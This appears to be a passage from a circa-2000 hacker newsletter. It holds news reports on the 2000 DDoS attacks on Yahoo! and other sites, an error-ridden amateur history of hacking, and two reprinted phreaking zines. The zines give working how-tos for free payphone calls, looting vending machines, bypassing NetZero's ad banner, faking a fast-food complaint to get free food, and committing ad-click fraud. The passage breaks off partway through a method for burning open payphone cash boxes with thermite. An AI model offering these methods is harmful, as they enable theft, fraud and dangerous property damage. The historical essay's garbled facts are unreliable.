      Meanwhile, investigators suggested that the vandals in Monday's attack 
      against the Yahoo! Web site - the first to be shut down for hours - may 
      have been far more sophisticated than originally believed.

      Ronald Dick, a senior official with the FBI's National Infrastructure 
      Protection Center, said earlier this week that automated hacker tools 
      widely available on the Internet mean that ``a 15-year-old kid could 
      launch these attacks.''

      ``This is not something that it takes a great deal of sophistication to 
      do,'' Dick said.

      But e-mail from engineers for search engine Yahoo! describing the attack 
      in detail said the vandals apparently ``knew about our topology and 
      planned this large-scale attack in advance,'' and that other companies hit 
      this week also       were targeted ``where it hurts the most.''

      This e-mail, sent as a warning to some Internet providers and obtained by 
      The Associated Press, also described the Yahoo! attackers as ``smart and 
      above your average script-kiddie,'' a derisive term for an unskilled 
      hacker. It said       the vandals ``probably know both Unix and networking 
      ... pretty well and learn about site topology to find weak spots.''

      An executive at GlobalCenter Inc., which provides Yahoo!'s Internet 
      connection, also said Friday that engineers there were surprised during 
      the attack, which flooded Yahoo! with more data each second than some 
      major Web sites       receive under normal conditions in a week.

      ``About an hour into the initial attack, they were already commenting 
      about what appeared to be some level of sophistication,'' said Laurie 
      Priddy, the company's executive vice president. ``These (vandals) seemed 
      pretty smart who       were doing it.''

      ``Denial of service tools are widely available and do not require great 
      sophistication to use,'' said a federal law enforcement official who 
      requested anonymity. ``But what we've seen already does seem to be a 
      somewhat       sophisticated attack.''

      At the White House, President Clinton said the Internet offers new 
      opportunities for people ``just mischievous and people who have far darker 
      motives.'' But he also held out hope that America will ``develop better 
      defenses and       better defenders.''

      ``If you go back from the beginning of time, where things of value are 
      stored, people with bad motives will try to get to those things,'' Clinton 
      said. ``Now vast things of values are stored in our computers and 
      transactions of great       values occur on the Internet.''

      Also Friday, Excite.Com - a popular search engine for the Web - said its 
      site also was targeted earlier this week by attackers. A flood of data 
      disrupted service for about half its customers for about one hour 
      Wednesday night until       the attack suddenly ended without warning, 
      spokeswoman Kelly Distefano said.

      In these attacks, called ``distributed denials of service,'' hackers 
      secretly install software tools on dozens or hundreds of powerful but 
      insecure computers - usually those of corporations or universities - then 
      remotely direct crippling       floods of electronic data at target Web 
      sites. 
      
      -=-
      
      CNN;
      
      Hacker hunters follow lead to Germany

      Web site attackers exploited Stanford computers

      February 13, 2000
      Web posted at: 4:13 p.m. EST (2113 GMT)

      From San Francisco Bureau Chief Greg Lefevre

      BERLIN (CNN) -- Cyber detectives tracking hackers who launched an 
      electronic offensive on several top Web sites have followed a lead
      to Germany.

      A program called "Stacheldraht" (Barbed Wire) was used to carry out 
      the attacks and whoever ran the program used its German name, a report
      in Die Welt newspaper said. 

      The FBI-led National Infastructure Protection Center
      is working on a theory that the Internet vandal
      responsible for Tuesday's attacks may be based
      somewhere in Germany. 

      U.S. President Bill Clinton has called a summit on
      Internet security for next week. 

      High capacity computers fooled by
      vandals

      Computers at a remote marine research campus
      operated by Stanford University near Monterey,
      California, were among those fooled on Tuesday into
      helping hackers attack some of the Internet's most
      heavily used sites, the head of Stanford's computer
      security department says. 

      Stephen Hansen, head of computer security at the
      school, said about 50 Stanford computers were
      fooled into helping route the denial of service attacks
      on Web sites, including eBay.com, CNN.com,
      Amazon.com, Buy.com and Yahoo! 

      Such computers are sometimes called "zombie"
      computers. In a denial of service attack, they send
      commands to high capacity computers that flood the
      affected Web site with millions of messages,
      blocking access to would-be users. 

      This kind of hack floods a Web site with so many
      requests it can't cope. Sources told CNN that Yahoo!
      was hammered with requests at one gigabyte per
      second. 

      That is similar to 104 million people dialing one company's phone lines
      at once. 

      Network engineer there in minutes

      Hansen said, "Within minutes we had a network engineer there. He went
      into the configuration and said 'OK, turn that off, don't allow them 
      to do that anymore.' 

      "Any time from that point on, any of those packets that arrived were 
      ignored. I'm glad we were able to find it quickly and were able to deal
      with it in short order." 

      Universities can be sitting ducks to these attacks, since schools want
      professors, researchers and students to have easy access to computers 
      to share research and swap information. 

      Stanford joins the University of California at Santa Barbara as victims 
      of the high-tech hijackings, in which the zombie computers are enslaved 
      to the command of hackers. 

      Kevin Schmidt, the UCSB campus network programmer, said, "If you go to a
      university, you have many different constituent groups. You've got 
      research groups, you've got people here for one year, you've got visiting
      research faculty." 

      Firewall is first line of defense

      The first defense against hackers is a software block called a firewall 
      -- but that may also keep out the very people for whom the system is 
      intended. 

      One of the Internet's original uses was to link scholars around the world 
      easily. Research projects at universities typically make it difficult to 
      implement an effective firewall, since a large number of openings are 
      needed for people to go through. 

      The recent spate of attacks may force universities to choose between 
      academic freedom and system security. 

      'Lots of computers were vulnerable'

      Sources told CNN the denial of service hacks were not sophisticated. They
      were done using ready-made programs. The hope is that with so many attacks,
      one of them is bound to leave traces. 

      Tribal Village (TFN) and Trinoo are two of the programs that experts say 
      are Internet time bombs -- ones used to jam the highly used sites. 

      Allison Taylor, of Network Associates, said, "They're roadmaps for people
      to copy from, and then you have copycat attacks over and over and over." 

      Taylor added, "We've found them in several places. They're prepackaged. 
      The hacker downloads and hacks the program into a number of unsuspecting
      computers. 

      "For this attack to happen on all these companies there had to be lots of
      computers out there that were vulnerable." 
      
      -=-
      
                 
      
      
      @HWA
      
      
07.0  A brief history of hackers By meliksah
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      By meliksah
      Writer for Turkish Security Site http://www.trsecurity.net/
      
      Email: meliksah@meliksah.net      
      
      History of Hackers:

      Everything began with the start of the telephone company (Bell-Telephone). 
      In that time there were inexperienced hackers. Of course in 1878 we did 
      not call them as hackers. They were the young people who worked just to 
      have fun in the local power station. They had the instinct to give wrong 
      invoice for unlovable people and they diverted the telephones to wrong 
      lines. 

      Firs computer pirates were seen in 60s. At MIT (Massachussets Institute 
      of Technology). There were hundreds       people who wanted to learn these 
      computer programs. In that times computers were in the freezed rooms and 
      the datas hided in the holed papers. They couldnt make what they want and 
      the clever people found hack to find the shortcut to their aims. Their 
      aim was to do the things in a faster way. Hack this word used first time 
      in 60s. Maybe the best hacks at all time was Dennis Ritchie and Ken 
      Thompson who work in BellLabs at 1969. They found Unix and it was state of 
      art.

      At 70system there was so many cyberlands to discover. Hacking was only to 
      understand how cable world is working.       In 1971 John Droper he was 
      in Vietnam war discovered that there was 2600 Mhz voice power. When he 
      combined Capn Crunch cornflakes boxes, he won a whistle. people could 
      crow whistle and talk without paying money, because voice power was 
      breaking the telephone lines. In that time phraking (talkfree) wasnt seen 
      harmful because it was harmful for only telephone companies. It didnt 
      affect the profit much so it wasnt important for the companies. With the 
      The Youth Internatical Party Line magazine all USA heard this discovery 
      1978 two boys from Chicago, Randy Seuss and Ward Christionsen discovered 
      BBS system which used on personal computers.

      In 1981 IBM produced first PCs that people were doing everything with 
      using them. But young people had attention in       Comodore 64 and 
      Spectrum because they were cheaper. In 1983 a film was on the movies 
      called War Games. People came across hackers with this film that had 
      shown warning. People understood hackers could use every system and they 
      can get in the whole computers. But hackers changed the peoples mind and 
      told them that you can find beautiful girls with these kind of systems 
      so, backgraund was changing slowly and Arpanet was turning into internet. 
      But BBSs popularity was the point of explosion and people met a hacker 
      group called 414 in the Milwaukee. They broke from the Los Alamos 
      Laboratorys computer passwords to Manhatten Cancer Institutes computer 
      passwords and changed their datas. Then 414 members were captured by 
      police.

      Hacker wars started at 1984. A pirate called Lex Luthor made a group named 
      as Legion of Doom (LOD). Group was       very sucessful but Phiber Optik 
      left the group and made new one in 1990 named Masters of Deception (MOD) 
      and they started to war until 1992. They changed the philosophy of the 
      pirating from to reach secret information to to destroy other group.

      In 92s FBI arrested Phiber Optik and his friends, hacker wars were 
      finished with this event. With government became       online the fun has 
      finished. They even made laws in country to reduce hacker numbers. In 
      1988, Robert Morris and Net Worm born again. They destroyed 6000 system in 
      the same time and they were the first people got in to jail from this new 
      laws. They had to pay 10.000$ and spent their time for social services. 
      Afterwards some others occured in this cyberland and destroy the system of 
      Digital, gone in to jail for one year. Government made operations and name 
      of the operation was Operation SunDevil to catch the hackers. Especially 
      they wanted to finish Legion of Dooms actions. Then from the inform of 
      the LOD four MOD members were caught by the police. In 1994 a Russian 
      mathematicion made a group and made 12 million dollar loss for the 
      Citibank. Vladimir was caught in airport at London. Kevin Mitnick was 
      caught too for stealing 20.000 creditcard numbers. However he has been in 
      prison since 1995. People affected in bad way after took these news. A 
      foby began at net users, American people called this situation Anarchy.

      Now people call hackers as problemed people, and problem makers now their 
      file status changed a lot. What about       now? Who is on the scene? Now 
      there are not much legendary names but there is still prepearing and 
      programming. There is a saying in hacker mafia If you are a good hacker 
      everybody knows your name but if you are the best one they nobody knows if 
      you are living. 
 
      Resources
      Discovery Channel
      Chip Turkey
 
      Last Update : 27/12/1999
 
 
      (C)opyright Meliksah Ozoral
      All Rights Reserved 
      
      @HWA
      
08.0  New phreaking zines released can you dig the retro?
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~      
      
      For your review, i'm posting issues one and two here.
      
      Find them on angelfire (gak) at http://www.angelfire.com/yt/smite/
      these are brand new zines (and you can tell) but maybe they'll
      turn into something decent in the future, phreak info is hard
      to find and a tough job for anyone to attempt to take on - Ed
      
      Horrible formatting corrected where possible, all caps are
      theirs...(?) nothing new and mediocre content but its a fresh
      attempt by some newbies to revive a cliquey scene.
      
      These weree releasedd this year despite the incredibly retro
      look believe it ot not. Last issue was released Feb 2000. -Ed
      
      
      
      
      
      SMITE ISSUE #1
      ~~~~~~~~~~~~~~
      
      $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
      $$$$    $$$ $$$$ $$$ $$$     $$$     $$$$
      $$$$ $$ $$$  $$  $$$ $$$$$ $$$$$ $$$$$$$$
      $$$$$ $$$$$ $  $ $$$ $$$$$ $$$$$  $$$$$$$
      $$$$$$ $$$$ $$$$ $$$ $$$$$ $$$$$ $$$$$$$$
      $$$$ $$ $$$ $$$$ $$$ $$$$$ $$$$$ $$$$$$$$
      $$$$    $$$ $$$$ $$$ $$$$$ $$$$$     $$$$
      $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
      $$$$$$$$$$$$$$$$$ISSUE ONE$$$$$$$$$$$$$$$
      $$$$$$$$$$$$$$$DECEMBER 1999$$$$$$$$$$$$$
      $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
      
      
      CONTENTS:
      
      -INTRODUCTION
      -SHOP CLASS: POOR MAN'S TONE DAILER
      -CHEAPSKATE'S CORNER: FREE COKES
      -'LEET LITTLE 'SPLOITS: FREE NET ACCESS
      -NEWS YOU SHOULD KNOW (BUT PROBABLY DON'T): FREE SPEACH? BAH!
      -CLOSING 
      
      *************************************************
      *                  INTRODUCTION                  *
      **************************************************
      
      THIS IS THE FIRST ISSUE. WHAT MORE CAN I SAY? LIKE IT OR DON'T--LET ME
      KNOW.
      
      
      
      
               ###SHOP CLASS FOR THIS MONTH###
      
      **************************************************
      *      THE POOR MAN'S TONE DAILER -- BY EGGO     *
      **************************************************
      
      SO YOU'RE CHEAP, NO, VERY CHEAP. YOU CAN'T AFFORD $24 FOR A RAT SHACK
      TONE DAILER. ARE YOU DOOMED TO LIVE LIFE A LAME NEWBIE THAT CAN'T MAKE
      FREE CALLS? NO. I PRESENT TO YOU THE
      (VERY) POOR MAN'S TONE DAILER. 
      
      PARTS:                      QUANTITY:
      
      *PHONE                          1
      *9V BATTERY CLIP                2
      *9V BATTERY                     2
      *DPST SWITCH                    1
      
      
      ASSEMBLY:
      
      YOU PROBOBLY ALREADY KNOW BUT I'LL MAKE A 1337 LITTLE ASCII SCHEMATIC 
      FOR YOU ANYWAY.
      
      
      
      
      
                                           (SWITCH)
                                            ___#___
                                ___________!       !__________
                                | _________!-------!___      | 
                  _______ (RED) | |                   |      |
                 |       |------| |-|   ______________|      |
        MODULAR  |       |          |   |                    |
         PLUG -->|       |-------|  |   |   - 9V +   - 9V +  |   
        (FEMALE) |_______|       |  |___|___|    |___|    |__|__  
                                 |
                                 |
                           [TO MAIN BOARD]
      
      YUP, THATS RIGHT, YOU GUESSED IT, ALL IT DOES IS GIVE THE PHONE POWER
      WHILE IT IS NOT PLUGED IN. SO NOW EVEN POOR FOLKS CAN MAKE FREE CALLS
      FROM COCOTS. 
      
      
      
      ***************************************
      *  GETTING FREE COKES -- BY KORNFEID  *
      ***************************************
      
      
      THIS METHOD OF OBTAINING FREE COKES IS KNOWN AS "JACKPOTING" AND WAS 
      INVENTED BY MYSELF OK SO YOU COME HOME FROM A HARD DAY OF PHREAKING AND 
      YOUR THIRSTY. YOU OPEN YOUR CARDED FRIDGE AND ALL YOU SEE ON THE SHELVES-A 
      JAR OF MAYONASE AND SOME MOLDY BREAD. THAN YOU REMEMBER YOU KNOW HOW TO 
      OBTAIN LIQUID SUSTINANCE FOR FREE. YOU HEAD DOWN TO THE LOCAL 7-ELEVEN AND 
      BUY A THING OF SALT FOR $1.19-OR CHEAPER IF THE SECURITY IS LAX (A GIVEN). 
      STEP OUT SIDE AND PROCEIDE TO MAKE SURE NO ONE IS LOOKING AND POUR THE 
      SALT INTO THE COIN SLOT-AFTER YOU HAVE GOTTEN A BAG READY-AND ENJOY THE 
      RAIN OF COKES. THIS WORKS BY PRESSING THE COIN COUNTER THINGIES ALL AT 
      ONCE WHICH CAUSES THE MACHINE TO DUMP ALL ITS COKES-I'VE NEVER TRIED THIS 
      WITH CANDY MACHINES BUT IT MIGHT WORK. I HAVE HEARD OF A SIMILAR METHOD 
      WITCH USES SALT WATER INSTEAD BUT I HAVE NEVER TRIED THIS ONE. ANOTHER 
      METHOD-WHICH APPERED IN PHRACK MAGIZINE INVOLVES PUTTING TAPE ON A DOLLAR 
      AND YANKING IT BACK OUT ONCE IT HAD BEEN VALIDATED. TAKE THE DOLLAR AND 
      PUT IT FLAT ON A TABLE LIKE YOU WERE PUTTING IT IN A MACHINE WITH GEORGE'S 
      HEAD FACING LEFT( THAT'S <-- FOR ALL YOU YOUNGINS) AND PUT STRIPS OF 
      PACKING TAPE ON THE EDGES AS SHOWN IN THE DIAGRAM I PLAGURIZED FROM 
      PHRACK. (SEE BELOW) WHEN YOU ARE DONE WITH THIS YOUR ARE READY TO GET SOME 
      FREE COKES. JUST STICK THE WHOLE THING IN THE MACHINE DOLLAR FIRST (DUH) 
      AND ONCE IT STOPS IN THERE MAKE YOUE SELECTION. THAN YANK THE WHOLE THING 
      OUT (SLOWLY) AND YOU GET YOUR MONEY BACK. THE PROBLEM WITH THIS METHOD IS 
      THAT IT ONLY WORKS WITH THE OLDER TYPE OF MACHINES. 

      DIAGRAM:
      
      __________________________________________________
      |****************************|*******************|<--
      |****************************|1       /@\       1|  |  TAPE ONLY
      |************TAPE************|   00  /@@@\  88   |  ]--ALONG THE
      |****************************|   00  \@@@/  88   |  |  SIDES
      |****************************|1       \@/       1|  |
      |****************************|*******************|<--
      --------------------------------------------------
                           
          ^----DOUBLE THE TAPE ON ITSELF HERE
               SO IT WON'T STICK TO ANYTHING
      
      YOU JUST PUT CLEAR PACKING TAPE ON THE EDGES OF THE DOLLAR AND TRAIL IT
      OFF ABOUT 15 INCHES SO THAT YOU HAVE ENOUGH FOR THE VARIOUS MACHINES. 
      
      
      
      
      
      
      ***************************************************
      *  LEET LIL 'SPLOITS: FREE NET ACCESS -- BY EGGO  *
      ***************************************************
      
      SO YOU HAVE PROBOBLY HEARD ABOUT NET ZERO, THE COMPANY THAT WILL GIVE YOU 
      FREE INTERNET ACCESS JUST FOR HAVING AN AD BANNER ON YOUR DESKTOP. (NO 
      THAT'S NOT THE END OF THIS FILE) THIS BANNER REALY IRRITATES ME, YOU CAN'T 
      MINIMIZE IT, (ITS PRETTY FUCKING BIG) AND IF YOU USE A PROG SUCH AS 
      "HACKIT4.EXE" IT GETS ALL HUFFY AND BOOTS YOU OFF. SO FROM THE MINUTE I 
      GOT IT, I TRIED TO FUCK WITH IT (NOT LIKE THAT!). IT ONLY TOOK ME ABOUT A 
      DAY TO FIGURE OUT THAT THE BANNER IS STARTED AND CONTROLLED BY A FILE 
      CALLED "NET.DLL" IN THE FOLDER CALLED "BIN", MY FIRST THOUGHT WAS TO ALTER 
      THE FILE SO THE BANNER WOULDN'T SHOW UP. I SEARCHED FOR A WAY TO SO MUCH 
      AS LOOK AT THE FILE, TO NO AVAIL (I FEEL VERY NON-LEET). SO IN A 
      LAST-DITCH EFFORT TO RID MYSELF OF THIS VILE BANNER THAT HAUNTED MY SOUL, 
      I RENAMED IT TO "NET2.DLL" I RAN THE NETZERO PROGRAM, ENTERED MY PASSWORD, 
      AND LO AND BEHOLD--IT WORKED! IT TURNS OUT THE FILE DOES NOTHING BUT RUN 
      THE AD BANNER AND THE "CREATE NEW ACCOUNT" OPTION. SO ALL YOU HAVE TO DO 
      IS RENAME ONE LITTLE FILE (DON'T DELETE IT, THEY MAY DECIDE TO CANCEL YOU 
      ACCOUNT AND YOU'LL NEED IT TO MAKE A NEW ONE) AND YOU HAVE FREE UNLIMITED 
      ACCESS TO THE INTERNET (READ: PORN :) ). NOTE:I MADE THE MISTAKE OF 
      TELLING A FEW PEOPLE HOW TO DO THIS, AND WORD GOT AROUND TO THE GOOD OL' 
      FOLKS AT NETZERO. SO THEY CORRECTED IT AND THE NEW VERSIONS WON'T RUN 
      WITHOUT NET.DLL IN PLACE. ANSWER: USE THE OLD VERSION. 
      
      
      **************************************************
      *       NEWS: FREE SPEACH? BAH! -- BY EGGO       *
      **************************************************
      
      
      WE ALL HEARD ABOUT THE RECENT TRADGEDY AT COLUMBINE HIGH SCHOOL,BUT YOU 
      MAY NOT HAVE HEARD OF THE WAVE OF PARANOIA THAT HAS PASSED IN IT'S WAKE. 
      IN EARLY SEPTEMBER, A COUPLE OF STUDENTS AT AN OHIO HIGH SCHOOL WERE 
      ARRESTED FOR SAYING WHAT THEY *HYPOTHETICLY* WOULD HAVE DONE THEY WERE IN 
      THE SITUATION THAT FACED THE TWO STUDENTS AT COLUMBINE HIGH. THEY HAVE 
      BEEN HELD WITHOUT BAIL FOR MONTHS (AT THE TIME OF THIS WRITING) AND ARE 
      GOING TO TRAIL SOON. NOW THIS STRUCK ME AS STRANGE, SENCE WHEN WAS IT 
      ILLEGAL TO TALK ABOUT *ANYTHING*? (SLANDER AND LIBEL NOTWITHSTANDING) AS 
      FAR AS I HAVE HEARD, THEY DID NOT THREATEN THE LIFE OF THE PRESIDENT, 
      (WHICH IS ILLEAGL) BUT THEY MERELY SAID A FEW THINGS THEY WOULD HAVE DONE 
      DIFFERENTLY. HAS THIS COUNTRY FORGOTTEN THE FIRST AMMENDMENT OF THE 
      CONSTITUTION? (BTW WHY IS IT CHARLIE HESTON CAN SITE THE SECOND AMMENDMENT 
      AND IT WILL HOLD WATER, BUT THE FIRST IS BEING TRAMPLED INTO THE DUST 
      EVERYWHERE WE LOOK?) I (AND ANYONE ELSE FOR THAT MATTER) CAN SAY WHATEVER 
      THE FUCK I WANT, WHENEVER THE FUCK I WANT, OR AT LEAST I THOUGHT SO... 
      
      
      
      **************************************************
      *                    CLOSING                     *
      **************************************************
      WELL THAT CONCLUDES THE FIRST EDITION OF SMITE. I WILL BE RELEASING IT ON 
      A MONTHLY BASIS, SO IF YOU WANT TO SUBMIT AN ARTICLE, DO SO BEFORE JANUARY 
      31 SO I CAN GET IT INTO THE NEXT ISSUE. ALL ARTICLE SUBMITIONS SHOULD BE 
      DIRECTED TO: EGGOTWRP@HOTMAIL.COM

      
      
      ---------------------------------------------------
      I FREQUENT ALT.PHREAKING ON USENET SO LOOK FOR MY WISE <> WORDS THERE. BUT 
      READ THE FAQ FIRST!! IT CAN BE FOUND AT: 
      http://members.tripod.com/SeusslyOne WANT TO TELL ME HOW LEET I AM? 
      GENERALY KISS MY ASS? CALL ME A DUMB FUCK? I CAN BE REACHED AT 
      EGGOTWRP@HOTMAIL.COM I RESPOND TO (MOST) MAIL, SO IF YOU WANT TO ASK ME 
      SOMTHING THAT IS YOUR BEST BET. COPYWRITE (C) 1999 BY EGGO
      
      
      -=-=-=-=-
      
      SMITE ISSUE #2
      ~~~~~~~~~~~~~~
      
                   _/_/_/   _/      _/   _/_/_/   _/_/_/_/_/   _/_/_/_/
                _/         _/_/  _/_/     _/         _/       _/
                 _/_/     _/  _/  _/     _/         _/       _/_/_/
                    _/   _/      _/     _/         _/       _/
             _/_/_/     _/      _/   _/_/_/       _/       _/_/_/_/
      
      
                   $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
                   $$$$$$$$$$$$$$$$$ISSUE TWO$$$$$$$$$$$$$$$
                   $$$$$$$$$$$JANUARY/FEBUARY  2000$$$$$$$$$
                   $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
      
      
      CONTENTS:
      
      -INTRODUCTION
      -UPDATES
      -THE THEORETICAL PHYISICIST'S HOUR--EGGO
      -CHEAPSKATE'S CORNER--KORNFEID
      -SHOP CLASS--EGGO
      -GREAT QUOTES--VARIOUS AUTHORS
      -CONCLUTION
      
      
      
      INTRODUCTION:
      
      WELCOME TO THE SECOND ISSUE OF SMITE. I AM NOT IN SUCH LIGHT SPIRITS THIS 
      ISSUE. MY FRIEND AND CO-WRITER OF THIS ZINE, JAMES AVERY, AKA KORNFEID, IS 
      DEAD. HE DIED ON JANUARY 1ST, KILLED BY SOME DRUNKEN REDNECK, WHILE ON HIS 
      WAY TO GET FOOD AFTER A PARTY AT OUR DORM. JAMES IS THE ONE WHO GOT ME 
      INTERESTED IN PHREAKING, AND SHOWED ME A LOT OF WHAT I KNOW ABOUT IT. I'VE 
      DECIDED TO CONTINUE WITH THE ZINE, PUBLISH THE LAST OF HIS "CHEAPSKATE'S 
      CORNER" ARTICLES, THEN CONTINUE THEM MYSELF. THIS ZINE WAS HIS IDEA IN THE 
      FIRST PLACE, SO I DEDICATE THIS, AND ALL SUBSIQUENT ISSUES TO HIM. THIS IS 
      FOR YOU JAMES. 
      
      
      
      *******************************************************
      ************************UPDATES************************
      *******************************************************
      
      --YOU CAN IN FACT HACK THE NEW VERSION OF NETZERO, YOU JUST HAVE TO CHANGE 
      THE NAME OF NET.DLL *AFTER* YOU OPEN THE PROGRAM, BUT BEFORE YOU LOG ON. 
      YOU HAVE TO CHANGE IT BACK TO SIGN ON AGAIN, BUT HEY, IT'S FREE, SHUT UP. 
      
      *******************************************************
      *      THEORETICAL PHYSICIST'S HOUR -- BY: EGGO       *
      *                                                     *
      *  --BELL'S THEOREM, AND FASTER THAN LIGHT MODEMS--   *
      *******************************************************
      
      I RECENTLY SAW A VERY THOUGHT-PROVOKING SHOW ON THE LEARNING CHANNEL. IT 
      WAS ALL ABOUT QUANTUM MECHANICS AND THE LIKE, ONE PARTICULAR SEGMENT, 
      COVERING BELL'S THEOREM, GOT ME TO THINKING. HERE IS MY IDEA:

      FIRST, AN EXPLANATION OF THE CONCEPT. I'M NOT GOING TO GET INTO THE ACTUAL 
      MATHMATICS OF BELL'S THEOREM, BUT RATHER THE POSIBLE APPLICATIONS. FOR 
      STARTERS, IMAGINE A PAIR OF       PHOTONS, THEY ARE COMPLETE OPOSITES. 
      I.E. PHOTON "a" HAS A PARTICULAR SPIN, CHARGE, AND ALL THE OTHER ATRIBUTES 
      THAT A PHOTON CAN HAVE. PHOTON "b" HAS ALL THE SAME TRAITS, ONLY IN 
      REVERSE, REVERSE SPIN, OPOSITE CHARGE, AND EVERYTHING ELSE. IF YOU WERE TO 
      CHANGE ANY ONE OF THOSE ATRIBUTES, THE SAME THING WOULD HAPPEN TO THE 
      OTHER, INSTANTLY. REGARDLESS OF DISTANCE.

      SO IF I HAD A PAIR OF THESE PHOTONS (ACTUALY IT CAN BE ANY PARTICLE), EACH 
      IN A CONTAINER, AND SENT ONE TO THE OTHER SIDE OF THE WORLD, (OR ANYWHERE 
      ELSE FOR THAT MATTER) AND       CHANGED THE POLAIRITY OF PHOTON "a", THE 
      POLARITY OF PHOTON "b" WOULD ALSO CHANGE. (THIS HAS BEEN DONE ALREADY, BY 
      A FRENCH PHYSICIST NAMED ALAIN ASPECT IN 1882.) 

      RIGHT ABOUT HERE I STARTED TO PONDER THE PRACTCAL USES FOR A DIVICE BASED 
      ON THIS CONCEPT. IF YOU WERE TO BUILD A MODEM-LIKE DIVICE, BUT INSTEAD OF 
      A PHONE LINE, IT IS CONNECTED       SOMTHING TO CHANGE THE POLARITY OF THE 
      PHOTON IN YOUR BRAND NEW "PARTICLE COMUNICATIONS DIVICE", (THE COMPUTER 
      YOU ARE TRYING TO COMUNICATE WITH HAS THE COUNTERPART OF YOUR PHOTON, IN 
      IT'S "PCD") AND MESSAGES ARE SENT, OVER INSANE DISTANCES, INSTANTLY. 

      ONE OF THE MAJOR HURDLES TO OVERCOME BEFORE WE CAN SEND PEOPLE TO MARS, IS 
      THE FACT THAT IT TAKES RADIO WAVES FIFTEEN MINUTES TO GET THERE. WITH A 
      DIVICE LIKE THIS, THAT WAITING       TIME WOULD SHRINK DOWN TO ZERO. IF 
      MAJOR INTERNET BACKBONES USED "PCD'S" INSTEAD OF CABLES, THE SPEED OF THE 
      INTERNET WOULD JUMP EXPONENTIALY. IF THESE BECAME WIDELY USED, THE ONLY 
      THING THAT WOULD SLOW THE COMMUNICATIONS PROSESS WOULD BE THE PEOPLE AT 
      EITHER END.
      
      
      
      ********************************************************
      *         CHEAPSKATE'S CORNER  --  KORNFEID            *
      *                                                      *
      *                LIE, CHEAT AND STEAL                  *
      ********************************************************
      
      WELL, YOU JUST THINK YOU'RE A BADASS NOW BECAUSE YOU CAN GET FREE COKES 
      HUH? WELL WAIT 'TILL YOU SEE WHAT 'OL KORNFEID HAS IN STORE FOR YOU THIS 
      MONTH.

      HOW TO SURVIVE COLLEGE ON LESS THAN TWO ALTERIAN DOLLARS A DAY:

      1) LIE       EXAMPLE: YOU ARE HUNGRY, MOST PEOPLE WOULD GO TO McDONALDS 
      AND BUY A BURGER. NOT YOU! YOU SIMPLY WALK TO THE NEAREST PAYPHONE, MAKE A 
      CALL TO THE MICKEY D'S AND SAY THE FOLLOWING (HINT: SOUND PISSED): 
      "GODDAMNIT! I JUST CAME THROUGH YOUR FUCKING DRIVE-THRU AND YOU FUCKED MY 
      ORDER ALL UP!!" "OK SIR, IF YOU'LL JUST GIVE ME YOUR NAME, I'LL GIVE YOU 
      STORE CREDIT." "I DON'T WANT NO FUCKING STORE CREDIT. I WANT MY FUCKING 
      BURGER!" "ALRIGHT SIR, IF YOU CAN COME BACK TO THE STORE, WE WILL CORRECT 
      YOUR ORDER." "FINE! I'LL BE THERE IN TEN MINUTES, MY NAME IS JOE BLOW, AND 
      YOU HAD BETTER HAVE MY ORDER REDAY WHEN I GET THERE." (SOMETIMES)"ALRIGHT 
      SIR WHAT WAS MISSING FROM YOUR ORDER?" "TWO BURGERS AND SOME FRIES."

      YOU GET TO THE STORE, THEY WILL ASK TO SEE YOUR RECEIPT, THIS IS WHERE THE 
      CLEVER PART COMES IN, YOU GIVE THEM AN OLD RECEIPT THAT YOU HAVE SPILLED 
      KETCHUP ON, COVERING THE DATE.       (MAKE SURE THAT THE ORDER ON IT 
      RESEMBLES WHAT YOU "ORDERED")

      THEY WILL USUALY GIVE YOU THE FOOD WITHOUT QUESTION, BUT IF THEY SAY 
      ANYTHING, JUST KEEP BITCHING ABOUT YOUR HUNGRY KID (OR SOMTHING ALONG 
      THOSE LINES). AND MAKE SURE TO HOLD       UP THE LINE, THEY ARE MORE 
      LIKELY TO SUBMIT TO YOUR PLOY IF THEY ARE UNDER STRESS FROM OTHER 
      CUSTUMORS TOO.

      2) CHEAT       SO MAYBE YOU HAVE A JOB, MAYBE YOU DON'T. IT MAKES NO 
      DIFFERENCE REALY, YOU'RE STILL BROKE ALL THE TIME. SO YOU NEED TO GET 
      MONEY FROM EVERYONE WHO WILL GIVE IT TO YOU. EXAMPLE: YOU HAVE PROBABLY 
      HEARD OF THE COMPANIES LIKE ALLADVANTAGE.COM THAT WILL PAY YOU FOR 
      DISPLAYING A BANNER ON YOUR DESKTOP, SIGN UP FOR AS MANY OF THESE AS YOU 
      CAN FIND.

      NOW, YOU NEED ANOTHER VIDEO CARD (YOU SHOULDN'T NEED A MONITOR ATTACHED TO 
      IT, BUT I HAD AN EXTRA SO I HOOKED IT UP. NOW YOU MAY NOT KNOW THIS, BUT 
      WINDOWS 98 HAS       MULTI-MONITOR SUPPORT, SO YOU SET THE BANNERS UP TO 
      RUN ON YOUR EXTRA MONITOR, ALONG WITH A BROWSER WINDOW. NOW ALL YOU NEED 
      TO DO IS WRITE A MACRO (OR USE A PROGRAM, THEY ARE WIDELY AVAILABLE) THAT 
      WILL MOVE THE MOUSE AND CHANGE THE URL PERIODICLY, AND YOU HAVE SOMTHING 
      THAT YOU CAN RUN 24-7, AND "EARN" AS MUCH AS $120 A MONTH! (BETWEEN ME AND 
      EGGO, WE MAKE ABOUT $250 PER MONTH) NEEDLESS TO SAY, YOU SHOULD HAVE THE 
      MONEY SENT TO A P.O. BOX, SO YOU CAN CHANGE IT IF THE COMPANY CATCHES ON 
      (SOMETIMES THEY DO).

      3) STEAL       YOU CAN SUPLIMENT YOUR INCOME BY FLAT-OUT STEALING. I DON'T 
      LIKE DOING THIS BECAUSE IT DOESN'T TAKE ANY TALENT. EXAMPLE: MAKE SOME 
      THERMITE. STEAL A ROLL OF MAGNISIUM RIBBON FROM YOUR LOCAL CHEMISTRY 
      CLASS. MAKE LITTLE PACKETS OF THERMITE THAT ARE SMALL ENOUGH TO FIT IN THE 
      KEYHOLE OF A PAYPHONE, STICK A PACKET INTO EACH OF THE KEYHOLES THAT ARE 
      USED TO OPEN THE CASH BOX (THERE ARE THREE) PUT A TWO-INCH SLICE OF 
